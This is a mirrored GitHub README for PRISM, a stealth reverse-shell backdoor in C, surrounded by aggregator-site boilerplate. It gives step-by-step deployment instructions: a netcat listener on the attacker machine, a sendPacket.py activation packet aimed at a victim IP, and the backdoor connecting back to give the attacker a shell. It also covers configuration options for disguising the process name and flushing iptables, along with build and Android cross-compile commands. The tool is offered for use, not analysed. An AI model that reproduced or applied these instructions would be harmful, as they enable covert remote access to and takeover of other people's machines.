GithubHelp home page GithubHelp logo

anthrax3 / prism Goto Github PK

View Code? Open in Web Editor NEW

This project forked from andreafabrizi/prism

0.0 1.0 0.0 9 KB

PRISM is an user space stealth reverse shell backdoor, written in pure C.

C 76.69% Python 23.31%

prism's Introduction

Prism backdoor

PRISM is an user space stealth reverse shell backdoor. The code is available on GitHub.

It has been fully tested on:

  • Linux
  • Solaris
  • AIX
  • BSD/Mac
  • Android

PRISM can works in two different ways: ICMP and STATIC mode.

ICMP mode

Using this operation mode the backdoor waits silently in background for a specific ICMP packet containing the host/port to connect back and a private key to prevent third party access.

  • First, run netcat on the attacker machine to wait for incoming connection from the backdoor:
$ nc -l -p 6666
  • Using the sendPacket.py script (or another packet builder) send the activation packet to the backdoor:
./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

192.168.0.1 is the victim machine running prism backdoor
p4ssw0rd is the key
192.168.0.10 is the attacker machine address
6666 is the attacker machine port

  • The backdoor will connect back to netcat!

STATIC mode

Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:

 $ nc -l -p [PORT]

Features

  • Two operating modes (ICMP and STATIC)
  • Runtime process renaming
  • No listening ports
  • Automatic iptables rules flushing
  • Written in pure C
  • No library dependencies

Get the code

git clone https://github.com/andreafabrizi/prism.git

Configuration

Before building, you have to configure the backdoor editing the source code.
Following the configuration parameters description:

STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection

ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor

Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name

Building

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Available GCC options:
-DDETACH #Run the process in background
-DSTATIC #Enable STATIC mode (default is the ICMP mode)
-DNORENAME #Doesn't renames the process
-DIPTABLES #Try to flush all iptables rules

Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

Cross Compiling

  • Android
    Change the shell to /system/bin/sh
    apt-get install gcc-arm-linux-gnueabi
    arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism

  • Linux 64bit (using a 32bit host system)
    apt-get install libc6-dev-amd64
    gcc -DDETACH -m64 -Wall -s -o prism prism.c

  • Linux 32bit (using a 64bit host system)
    apt-get install libc6-dev-i386
    gcc -DDETACH -m32 -Wall -s -o prism prism.c

Backdoor building information

The backdoor ignore any command line parameter, except the Inf0 (the last char is a digit).
This option allow you to see some information about the backdoor:

$ ./prism Inf0
 Version: 0.5
 Mode: icmp
 Key: p455w0rD
 Process name: [udevd]
 Shell: /bin/sh
 Detach: Yes
 Flush Iptables: No

prism's People

Contributors

andreafabrizi avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.